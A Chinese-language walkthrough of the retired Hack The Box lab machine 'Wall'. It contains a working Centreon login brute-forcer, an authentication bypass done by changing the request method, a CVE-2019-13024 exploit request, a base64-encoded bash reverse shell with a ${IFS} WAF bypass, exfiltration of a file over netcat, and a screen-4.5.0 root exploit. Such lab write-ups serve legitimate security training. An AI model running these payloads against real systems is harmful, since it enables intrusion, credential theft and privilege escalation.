本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.157
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
信息枚举收集 https://github.com/codingo/Reconnoitre 跟autorecon类似 autorecon 10.10.10.157 -o ./Wall-autorecon sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.157 或者 sudo masscan -p1-65535,U:1-65535 10.10.10.157 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr ' ' ',' | sed 's/,$//') sudo nmap -Pn -sV -sC -p$ports 10.10.10.157
访问IP地址的80端口显示默认的apache页面,进行目录爆破 sudo gobuster dir -u http://10.10.10.157 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
访问得到的目录monitoring发现显示401认证,通过测试更改请求方法为POST可以成功绕过认证,根据显示的信息可以访问http://10.10.10.157/centreon 得到一个登录页面,centreon是个分布式监控系统,可参考:https://www.cnblogs.com/flytor/p/11440809.html
更改为post请求方法
发现响应200,显示信息提示存在一个url地址/centreon 正常使用get请求重放过去看看
显示一个登录框,网上搜索一把确认centreon是一套监控系统,此监控系统存在默认口令admin/centreon
可参考:https://www.tenable.com/plugins/nessus/80225 但是使用此默认账户密码登录失败了,同时查看burpsuite的抓包请求,发现centreon存在centreon_token认证,没错附带的token都不一样,所以常规的方法不能进行暴力破解,可以通过python代码进行暴力破解,当然也可以使用burpsuite的宏功能进行爆破,我这就是有python进行爆破
准备使用的爆破密码字典
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-passwords-shortlist.txt
爆破的python代码
#!/usr/bin/python3 import requests from bs4 import BeautifulSoup url = 'http://10.10.10.157/centreon/index.php' s = requests.session() def sendRequests(username, password): page = s.get(url) soup = BeautifulSoup(page.content, 'html.parser') token = soup.find('input', attrs = { 'name' : 'centreon_token' })['value'] data = { 'useralias' : username, 'password' : password, 'submitLogin' : 'Connect', 'centreon_token' : token } response = s.post(url, data = data) if 'incorrect' not in response.text: print("Credentials found {}:{}".format(username, password)) with open('top-passwords-shortlist.txt') as wordlist: for word in wordlist: password = word.rstrip() print("[*] Trying {}".format(password)) sendRequests('admin',password)
下面是执行的结果
kali@kali:~/Downloads/htb/wall$ python3 centreon.py [*] Trying password [*] Trying 123456 [*] Trying 12345678 [*] Trying abc123 [*] Trying querty [*] Trying monkey [*] Trying letmein [*] Trying dragon [*] Trying 111111 [*] Trying baseball [*] Trying iloveyou [*] Trying trustno1 [*] Trying 1234567 [*] Trying sunshine [*] Trying master [*] Trying 123123 [*] Trying welcome [*] Trying shadow [*] Trying ashley [*] Trying footbal [*] Trying jesus [*] Trying michael [*] Trying ninja [*] Trying mustang [*] Trying password1 Credentials found admin:password1
根据博客信息,可以知道要想执行命令需要请求下面uri地址且使用POST请求方法,并带上body参数
请求的uri地址
/centreon/include/configuration/configGenerate/xml/generateFiles.php
博客地址:https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/
具体请求参数
POST http://10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php HTTP/1.1 Host: 10.10.10.157 Content-Length: 33 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.157 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.157/centreon/main.get.php?p=60901&o=c&server_id=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: PHPSESSID=16f08s82qv7rui4vjdm8hbr6jc Connection: close debug=true&generate=true&poller=1
发现响应信息成功执行id命令,开始通过base64配置反弹shell,测试发现有WAF,使用{IFS}进行绕过
echo 'bash -i >& /dev/tcp/10.10.14.16/8833 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNi84ODMzIDA+JjEK
使用反弹shell代码配置centreon进行反弹shell
echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNi84ODMzIDA+JjEK|base64${IFS}-d|bash;
然后使用burpsuite进行重放方面的请求包,即可触发反弹shell
通过在目标靶机上信息搜集,发现一个备份文件backup
把这个backup文件传到本地kali
kali:nc -lvnp 9933 > backup.tgz 靶机:nc 10.10.14.16 9933 < /opt/.shelby/backup
目标靶机的backup文件是python字节码,可以通过uncompyle6进行反编译 安装 sudo pip3 install uncompyle6 编译 uncompyle6 backup.pyc
kali@kali:~/Downloads/htb/wall$ uncompyle6 backup.pyc # uncompyle6 version 3.7.4 # Python bytecode 2.7 (62211) # Decompiled from: Python 3.8.5 (default, Aug 2 2020, 15:09:07) # [GCC 10.2.0] # Embedded file name: backup.py # Compiled at: 2019-07-30 22:38:22 import paramiko username = 'shelby' host = 'wall.htb' port = 22 transport = paramiko.Transport((host, port)) password = '' password += chr(ord('S')) password += chr(ord('h')) password += chr(ord('e')) password += chr(ord('l')) password += chr(ord('b')) password += chr(ord('y')) password += chr(ord('P')) password += chr(ord('a')) password += chr(ord('s')) password += chr(ord('s')) password += chr(ord('w')) password += chr(ord('@')) password += chr(ord('r')) password += chr(ord('d')) password += chr(ord('I')) password += chr(ord('s')) password += chr(ord('S')) password += chr(ord('t')) password += chr(ord('r')) password += chr(ord('o')) password += chr(ord('n')) password += chr(ord('g')) password += chr(ord('!')) transport.connect(username=username, password=password) sftp_client = paramiko.SFTPClient.from_transport(transport) sftp_client.put('/var/www/html.zip', 'html.zip') print '[+] Done !' # okay decompiling backup.pyc
根据上面反编译的代码直接使用python交互的方式提取密码
kali@kali:~/Downloads/htb/wall$ python Python 2.7.18 (default, Apr 20 2020, 20:30:41) [GCC 9.3.0] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> password = '' >>> password += chr(ord('S')) >>> password += chr(ord('h')) >>> password += chr(ord('e')) >>> password += chr(ord('l')) >>> password += chr(ord('b')) >>> password += chr(ord('y')) >>> password += chr(ord('P')) >>> password += chr(ord('a')) >>> password += chr(ord('s')) >>> password += chr(ord('s')) >>> password += chr(ord('w')) >>> password += chr(ord('@')) >>> password += chr(ord('r')) >>> password += chr(ord('d')) >>> password += chr(ord('I')) >>> password += chr(ord('s')) >>> password += chr(ord('S')) >>> password += chr(ord('t')) >>> password += chr(ord('r')) >>> password += chr(ord('o')) >>> password += chr(ord('n')) >>> password += chr(ord('g')) >>> password += chr(ord('!')) >>> password 'ShelbyPassw@rdIsStrong!' >>>
使用这个密码ShelbyPassw@rdIsStrong! 直接ssh登录目标靶机 sshpass -p 'ShelbyPassw@rdIsStrong!' ssh -oStrictHostKeyChecking=no shelby@10.10.10.157
成功登录到目标靶机之后查找4000权限的二进制文件
shelby@Wall:~$ find / -perm -4000 2>/dev/null /bin/mount /bin/ping /bin/screen-4.5.0 /bin/fusermount /bin/su /bin/umount /usr/bin/chsh /usr/bin/passwd /usr/bin/gpasswd /usr/bin/traceroute6.iputils /usr/bin/chfn /usr/bin/newgrp /usr/bin/sudo /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/eject/dmcrypt-get-device shelby@Wall:~$
发现经典的screen-4.5.0漏洞,可直接提权root
https://www.exploit-db.com/exploits/41154
直接下载下来传到目标靶机上去提升到root权限
wget https://www.exploit-db.com/raw/41154 dos2unix 41154 cp 41154 screenpwn.sh scp screenpwn.sh shelby@10.10.10.157:/tmp/ chmod +x screenpwn.sh ./screenpwn.sh